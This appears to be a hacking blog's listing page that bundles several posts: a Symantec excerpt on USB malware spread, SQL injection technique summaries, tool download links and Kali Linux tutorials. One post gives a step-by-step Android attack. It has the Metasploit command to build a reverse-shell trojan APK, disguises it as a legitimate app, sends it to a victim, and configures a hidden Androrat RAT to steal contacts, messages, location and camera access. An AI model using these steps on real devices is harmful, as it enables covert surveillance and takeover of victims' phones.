Increase in USB-Based Malware Attacks

Symantec is currently observing an increase in malicious applications that use USB flash drive devices as a propagation method. Just as a clarification for any of our readers that are not familiar with the term “USB flash drive,” a USB flash drive is typically a removable portable storage device that uses a USB (universal serial bus) port to interface to a computer. USB ports are part of most modern computers and they are designed to allow many peripherals to be easily connected (plug-and-play) to a computer through a standardized interface. These USB flash drive storage devices are very useful and are becoming fairly ubiquitous in the workplace.

The USB flash drive storage medium is designed to be portable, making it easy to connect to many computers in its lifetime. This, unfortunately, exposes the flash drive to the risk of infection. There are many malicious applications that propagate simply by making a copy of themselves on all drives that are attached to a computer. The portability of the USB device and its small form factor can also make it easy for attackers to plug it into computers that they have limited physical access to, potentially granting them remote access at a later time.

At the moment, there are two popular methods that malicious applications use to infect USB flash drives:

Simple file copy method

With this method, a malicious application that is installed on an infected computer simply makes copies of itself to all storage devices that are attached to the infected computer. A copy of the malicious code will be placed on network shares, local drives, and removable media (such as USB flash drives) that are connected to the computer. Usually the malicious application will also attempt to copy itself to peer-to-peer (P2P) file-sharing shared folders as well. With this method, a malicious file is often named with a sensational filename to lure a victim into launching the file and causing malicious code to be executed. Quite often there are familiar file icons such as Microsoft Windows icons for videos and images that are used to trick unsuspecting victims into thinking that an executable file is a harmless image or video. This infection method requires that the victim manually execute the malicious file from their computer to become infected.

AutoRun.inf modification method
Microsoft Windows and some other operating systems have a functionality that is called “AutoRun” (sometimes also referred to as Autoplay). AutoRun functionality is basically designed to perform some actions that are automatically executed when removable media is inserted or removed from a computer.

On Microsoft Windows platforms, “autorun.inf” is the file that contains instructions for the AutoRun functionality. The autorun.inf file can instruct AutoRun to use a certain type of icon; add menu commands; and among other things, start an executable.

With this infection method, the malicious application modifies or creates an autorun.inf file on all of the network shares, local drives, and removable media (including USB flash drives) that are connected to the computer. When an infected USB flash drive is inserted into another computer, the copy of the malicious application is automatically executed. Under a default configuration of Windows, this infection method does not require any interaction from the victim other than physically attaching the media to the computer.

Increasing trend of drive-infecting malicious code

Symantec has recently observed that both of the above methods are becoming an increasingly popular propagation method for malicious code. We have noticed the following percentile increase in several pieces of malicious code that Symantec antivirus currently blocks:

 

This trend is substantiated in vol. XIII of the Symantec Internet Security Threat Report (quoted from page 56, Propagation mechanisms subsection of the Malicious Code Trends section):

"In the second half of 2007, 40 percent of malicious code that propagated did so as shared executable files (table 9), a significant increase from 14 percent in the first half of 2007. Shared executable files are the propagation mechanism employed by viruses and some worms that copy themselves to removable media. As stated in the “Malicious code types” section above, the increasing use of USB drives and media players has resulted in a resurgence of malicious code that propagates through this vector. This vector lost popularity among malicious code authors when the use of floppy disks declined and attackers instead concentrated on other more widely used file transfer mechanisms such as email and shared network drives. However, as use of removable drives has become more widespread, attackers have again begun to employ this propagation technique. Although current removable drives differ from floppy disks, the principle remains the same, enabling attackers to make simple modifications to old propagation techniques.”

Read More

How to Hack an android phone

Note – I will not be held responsible for anybodies actions , as this tutorial is for educational purposes.

Method 1 (Create your own Rat apk file)

You will need backtrack or kali-linux ,it’s available on their site for free at http://www.kali.org/downloads/.    Open up your new operating system using VMWare or by making a bootable USB. Here’s the 2 tools that you will need, either way will work.

VMWare workstation

RUFUS

When you have successfully booted into the OS , simply click the first option ” Default boot text mode ” and then a window will pop up that looks similar to command prompt. Type in ” startx ” and you will be in the GUI of the OS. Now we can finally start with the hacking phase. First go to the terminal. Type in the following commands.

1. apt-get update   ( make sure you are connected to the internet)

2. msfconsole

wait until the command fully loaded ( depends on your pc specs , it can take some time)

3. Execute this command in metasploit console

 Msfpayload android/meterpreter/reverse_tcp LHOST=<your internal IP> LPORT=<port for connection> R > trojan.apk
4. Then transfer trojan.apk to your android device and install APK Editor from google play to edit  the trojan.apk ( change icon and names ) so   that it looks like a legitimate app.

5. Send this apk file over to your victim’s phone.
6. Now going back to your open msfconsole window , type in the following to start your trojan.apk
7. use exploit/multi/handler
8. set lport < the port you used in trojan.apk >
9. exploit

Note – ** Don’t forget to make your IP static, as you don’t want your ip to change otherwise this won’t work **

And viola !! , you now have control of your victims phone.

You can access the victims directories , front-back camera and many more.

Method 2 ( Using Androrat )

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Features

• Get contacts (and all theirs informations)
• Get call logs
• Get all messages
• Location by GPS/Network
• Monitoring received messages in live
• Monitoring phone state in live (call received, call sent, call missed..)
• Take a picture from the camera
• Stream sound from microphone (or other sources..)
• Streaming video (for activity based client only)
• Do a toast
• Send a text message
• Give call
• Open an URL in the default browser
• Do vibrate the phone

How to configure Androrat :

1. You have to  make a id on Here and create a host.
2. You need to open port you want to use.  To do that Open Control panel > Network & Internet > Network & Sharing centre Then click on see full map option Right-Click on the Gateway or router>Properties In general tab, Go to settings , Click on add In Description of service , Write Androrat Now you have to check your ip, To Do this , open command prompt, type ipconfig, Scroll To ethernet Adapter local area connection,and note down the ipv4 address Now come back to Add window , in the name or ip address type the ipv4 address you have noted Now in the external & internal port number , type 81 , tcp should be selected, click ok Now click on Add button again…Now in Description , write androrat 1 In the name or ip address, type the ipv4 address you have noted Now in the external & internal port number , type 81 , udp should be selected, click ok.
3. Now extract the file , Open AndroRat Binder.exe.
4. Go to No-ip tab and fill your information & click on update.
5. Go to Build Tab.
6. In IP section, type the hostname  you have created by no-ip.
7. In port section , type 81.
8. In apk title ,Type any title you want.
9. Check the hidden box to hide the apk from mobile’s app drawer.
10. Click on Go.
11. Now you will see the apk with the title you have given in the extracted folder.
12. Now install that apk to any android mobile phone.
13. You will find a folder named Androrat in the extracted files.
14. Open Androrat>Androrat.jar (you should have java installed in your pc to open it).
15. Now click on server> Select port and enter 81, click ok & restart it.
16. Now , as soon as the android client is online , you will find it on the jar file ……select any server online.
17. Enjoy.

Download Androrat

Method 3 ( Using Dsploit )
For this hack app to work ,you need to be on the same network as the victim.
So what does this app have to offer? Just about everything. Password recovery , kill connections , Session hijacker (facebook , youtube etc.) , site re-director , image replacer and many more.
Simply download the app and install. You will be amazed how much power this app provides.
Download Dsploit

Read More

SQL Injection types

1. Boolean Based Blind SQL Injection
   1. For SQLMap, a Boolean based blind is a technique where in there is a lot of involvement of HTTP request and response reading character by character, comparison and detecting the right output.
   2. Once a vulnerable parameter is detected, SQLMap replaces or appends syntactically valid SQL statements for which we can expect some output.
   3. Say, there is an original un-tampered request with a vulnerable parameter, it has certain response and in next stage there is a request-response from an injected statement, then SQLMap performs comparison between these two responses.
   4. The tool uses bisection algorithm to fetch each character of the response with a maximum of seven HTTP requests and comparing their responses.
   5. Where the output is not within the clear-text plain charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.
2. Time Based Blind SQL Injection
   1. “Time based” itself suggests that there is some comparison on the basis of time the request and response by injecting syntactically valid SQL statement to the vulnerable parameter.
   2. SQLMap uses SQL statements which put the back-end database on hold to return for a certain number of seconds.
   3. Using the same technique i.e. bisection algorithm to inference the output character by character, SQLMap compares various HTTP responses time with the original request.
3. Error-Based SQL Injection
   1. The tool uses SQL statements which would provoke the target database to generate database-specific error.
   2. HTTP response to such request is then parsed by sqlmap in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
   3. This technique works only when the web application has been configured to disclose back-end database management system error messages.
4. UNION Query
   1. A syntactically valid SQL Statement starting with an UNION ALL SELECT is injected to the vulnerable parameter.
   2. UNION query based SQL injection works on the basis of the application behavior i.e. when the application passes the output of written SELECT query through certain loop or line of statements which allow the output to be printed on the page content.
   3. In case the output is not cycled through any “for loop” or other line of statements, SQLMap uses single entry UNION query SQL injection.
5. Stacked Queries
   1. Stacked queries exploitation occurs when an application is supporting stacked queries. SQLMap adds a semi-colon (;) to the vulnerable parameter value and appends SQL statement which is to be executed.
   2. Using this technique it is possible to run SQL statements other thank SELECT. This is useful for data manipulation, to get system read-write access and finally own the operating system.
6. Out-of-band
   1. This technique uses a secondary or different communication channel to dump the output of the queries fired on the vulnerable application.
   2. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain.

Read More

Top 10 Sql Injection tools

10 Powerful SQL Injection Tools That Penetration Testers Can Use
1. BSQL Hacker
This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.

Download: http://flexydrive.com/q75te2c2banl
2. The Mole
This is an SQL Injection tool that uses the union technique or the boolean query-based technique.
Download: http://flexydrive.com/3pr6tjhb0b8p
3. Pangolin
This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.
Download: http://flexydrive.com/i6sq1d5i6ysd
4. Sqlmap
This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.
Download: http://flexydrive.com/yrc3szqgr9i0
5. Havij
This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.
Download: http://flexydrive.com/t2j5ymthhlss
6. Enema SQLi
This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.
Download: http://flexydrive.com/qyxp8tk2m85z
7. Sqlninja
This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.
Download: http://flexydrive.com/2wp50o3ojbii
8. sqlsus
Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.
Download: http://flexydrive.com/tyn0mmznl7e5
9. Safe3 SQL Injector
This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.
Download: http://flexydrive.com/6rl4s64fug7i
10. SQL Poizon
This tool includes php , asp , rfi , lf dorks that can be used for penetration testing.
Download: http://flexydrive.com/o29h5b7p5221

Read More

How to add Workspace In Metasploit kali linux

Jai Hind I am DeadManINDIA from (IHT) 1ND14N H4X0R5 T34M

We are :- EagleShadow,Null_Port_Govind,Mr.R@66!T,Haxor-Rahul,Spy-Hunter,Grey-Noob,Karate-Katrina.

Love to :- My Mom And My Dad.

Today we will discuss on the how to add the workspace in metasploit in kali linux .
lets go 


Setup 1 :- first of all start the database and metasploit services with the help of these commands.
 1st :- service postgresql start
2nd :- service metasploit start

Setup2 :- Now run the metasoploit with the command .
syntax:- msfconsole

Setup 3 :- Now we are use the this command here to add the workspace in metasploit.
syntax:- workspace -a <worksapce name >

in this - a for add the workspace and <workspace name is the name of work sapce .

  in my case i add IHT workspace here .

Now most important thing we are using the - h option to see the help.
like this 

#workspace -h  


Thanks for reading
          Jai Hind Jai Bharat 
 

Read More

#‎HOW_TO_CHANGE_NAME_OF_A_FACEBOOK_FANPAGE_AFTER_200_LIKES‬:

As we know we can't change page name just after 200 likes. Means you are only able to change page name just before completing 200 likes on page and then after the option will be disappears and page name got fixed. In that condition suppose your page have 10,000+ or 200+ likes but you decide to change your business name then its a great problem because their is not possible way to shift.
►Steps For Changing Page Name:

1.Open Google Chorme Browser
2.goto Settings
3. Show Advance Setting
4.Change Proxy Set IP
5.212.138.92.17 port 8080
6.Restart Your Browser
7.Open Page
8. Update Page Info
9. Translated Name
10.Right Click on Arabic and Inspect Element
11.Change Arabic to
<tr class="_1hoi dataRow"><th
class="label">English:</th><td
class="data"><input type="text"
class="inputtext" name="en_XX"></
td></tr>
12.Now English will appear in place of Arabic, write new name and press save.
13.Name Changed Thats All

Read More

101 Top Tools For System And Network Admins!

101 Top Tools For System And Network Admins!

Are you a system administrator? If yes, then these tools will come in handy for you!    Rate this news:  (3 Votes) Monday, March 24, 2014:  System and network admins need a variety of tools to work with. These tools are available in numbers, which makes it hard to sort out the best from the rest. Here's help! System and Network Analysis: As an administrator, it is your job to monitor the system and network that you are presiding over. Analysis is an important part of being in the know of what's happening and when a particular action is required. That is where system and network analysis tools come in handy. 1. NTFS Permissions Explorer 2. Xirrus Wi-Fi Inspector 3. Whois 4. ShareEnum 5. PipeList 6. TcpView 7. The Dude 8. Microsoft Baseline Security Analyzer 9. WireShark 10. Look@LAN 11. RogueScanner 12. Capsa Free Network Analyzer 13. SuperScan 14. Blast 15. UDPFlood 16. IPplan 17. NetStumbler 18. PingPlotter 19. SolarWinds Free Permissions Analyzer for AD 20. Angry IP Scanner 21. FreePortMonitor 22. WirelessNetView 23. BluetoothView 24. Vision 25. Attacker 26. Total Network Monitor 27. IIS Logfile Analyser 28. ntop System testing and troubleshooting: What's the next logical step after analysis your network? Of course, testing whether your analysis was right or wrong. To put it more clearly, as a system or network admin, it is one of your jobs to perform tests on your domain. These are the tools that let you do that. 29. Pinkie 30. VMWare Player 31. Oracle VirtualBox 32. ADInsight 33. Process Monitor 34. SpiceWorks Network Troubleshooting 35. RAMMap 36. Autoruns 37. LogFusion 38. Microsoft Log Parser 39. AppCrashView 40. RootKitRevealer System and network management: These are tools that allow you to manage the network or system. In a way, they comprise of various tools that help an IT professional to manage a bunch of tasks or certain specific tasks. 41. Bitcricket IP Subnet Calculator 42. EMCO Remote Installer Starter 43. ManagePC 44. Pandora FMS 45. SNARE Audit and EventLog Management 46. OCS Inventory 47. Zenoss Core – Enterprise IT Monitoring 48. Unipress Free Help Desk 49. SysAidIT Free Help Desk 50. Cyberx Password Generator Pro System and Network Management: These are tools that allow you to manage the network or system. In a way, they comprise of various tools that help an IT professional to manage a bunch of tasks or certain specific tasks. 51. KeePass Password Safe 52. TweakUAC 53. Microsoft Application Compatibility Toolkit 54. ExtraSpy Employee Monitor 55. NetWrix USB Blocker Freeware 56. FileZilla 57. Wake On Lan 2 .NET 58. Speccy 59. Active Directory Explorer (ADExplorer) 60. ADRestore File and disk management: These are tools that allow you to perform various operations on your files. These include operations like de-duplication, copying, file comparison, merging, encryption, syncing, searching and renaming of files. These files can be invaluable additions to your arsenal as a system administrator. 61. Disk2vhd 62. Defraggler 63. PageDefrag 64. PsPad 65. MD5Summer 66. Universal Viewer 67. FreeCommander 68. Recuva 69. Steganos LockNote 70. Microsoft SyncToy 71. 7-Zip 72. PeaZip 73. Bacula 74. Areca Backup 75. DirSync Pro 76. Amanda Network Backup 77. WebSynchronizer 78. KGB Archiver 79. Iometer 80. Notepad++ Performance and availability monitoring: These tools allow you to monitor your system and network performance and monitor them for possible errors etc. They provide functions such as monitoring of memory utilisation, network utilisation, disk utilisation, CPU utilisation etc. In addition, you can also use the network monitoring tools in order to ensure that your network is performing at its optimal levels and is stable. 81. ManageEngine Free HyperV Performance Monitor 82. Nagios 83. ManageEngine Free Exchange Health Monitor 84. Kratos Exchange Monitor 85. ManageEngine Free Windows Health Monitor 86. ManageEngine Free Ping Tool 87. ManageEngine Free SQL Health Monitor Tool 88. ManageEngine Free VM Configuration Tool 89. Kratos Network Device Monitor 90. IxChariot QCheck 91. EasyNetMonitor Remote management: As a system or network admin, you will be dealing with a lot of remote connections and clients. In order to manage this task efficiently, you need tools like the ones mentioned below. You can use them to remotely administer clients and servers, manage remote desktop sessions and various other functions. 92. Remote Desktop Manager 93. TightVNC 94. Microsoft RDCMan 95. Terminals 96. PsFile All-in-one toolkits: Sometimes you do not want to use different tools for different purposes. You want tools that can manage multiple functionalities by themselves so that you don't have to switch over to a new one whenever your attention is needed in a new direction. These are all-in-one kits that fill up some of the gaps that exist in this respect. 97. Net Tools 5.0 98. ManageEngine Free Windows Tools 2 99. Axence NetTools Pro 100. Free IP Tools 101. PsTools

Read More

How to use Plecost Tool for scanning wordpress sites

Jai Hind friends I am DeadManINDIA From IHT(1ND14N H4X0R5 T34M).

We are :- Null_Port_Govind,Haxor-Rahul,EagleShadow,Spy-Hunter,Grey-Noob,
                Mr.R@66!T,Karate-Katrina.
Love to :- My Mother,My Father .

Today i m going to explain how to scan wordpress website with the help of Plecost in kali linux.

Steups :-
1  Change the directory like this and come in to the plecost directory
     /usr/share/plecost/
Syntax  :- cd /usr/share/plecost/

2 Now check the content of the directory here you find a wp-plugins-list.txt

 this the list of plugins of wordpress.

3 Final steup we are run this command for start scan 
Syntax:-   plecost -i wp_plugin_list.txt <url of site >

We are try to some differnt options in this tool so please read the manual and try those tools and enjoy.

Thanks for reading give your feedback on Facebook or Skype
FB =====>>>> DeadManINDIA
Skype======>DeadManINDIA1
                                                  Jai Hind Jai Bharat

Read More

How to Use BlindElephant tool in kali linux

Jai Hind Friends I am DeadManINDIA as u know today i m going to explain how we use the BlindElephan.py tool in kali linux.

Greetz To :- Null_Port_Govind,EagleShadow,Haxor Rahul,Mr.R@66!T,Grey-Noob,Spy-Hunter,Karate-Katrina,IndiWar,X-MAN-INDIA,Satish Choudhary ,Mahi Di.

Love to ----->>>>My Mother And My Father.

So lets Start :- 
 1 Open Terminal and type BlindElephant.py Like this

2  Read The Options carefully and then take next steup.
3 Then use this command
Syntax:- BlindElephant.py <site url> <type of site >
In this we are type or paste the url of site on the place of <site url>and
type of site like wordpress ,joomla, or other what kind of site you are going to scan.
see in my case i use like this

And in the last you find your result.

Thanks for reading give your feedback on Facebook Or Skype
FB = DeadManINDIA
Skype= DeadmanINDIA1
                                               Jai Hind 
                                             Jai Bharat

Read More

How to add plugin in OllyDbugger kali linux

Hell Friend I m DeadManINDIA From 1ND14N H4X0R5 T34M (IHT)
                                       JAI HIND
                               JAI BHARAT
 

Love to :- My Father,My Mother, Eagleshadow,Mr.R@66!T,Null_Port-Goving,Grey-Noob,Karate-Katrina,Spy-Hunter,Haxor-Rahul.

Lets Start :- 

What I am Doing ?
I am here explain how to add Hide Debugger 1.2.4 in OllyDbg in kali linux.

Steups :-
1 First of all download the Hide Debugger from here

2 Now uncompress the file with the help of command.
    Syntax:- unrar x Hide Debugger v1.2.4.rar

  3 In my case I uncompress the rar file on my desktop now we open the directory.And copy these files which i show in imp

4 Now we are paste these files in the ollyDbugger directory
   Open /usr/share/ollydbg/

And paste here all files which you copy.

Now start the ollydbg then you find the hide-dbugger pulgin in pulgins.


JAI HIND FRIENDS I HOPE YOU ENJOY TUT IF ANY PROBLEM THEN TELL ME ON FB OR SKYPE
FB = DeadManINDIA
Skype = deadmanindia1

Read More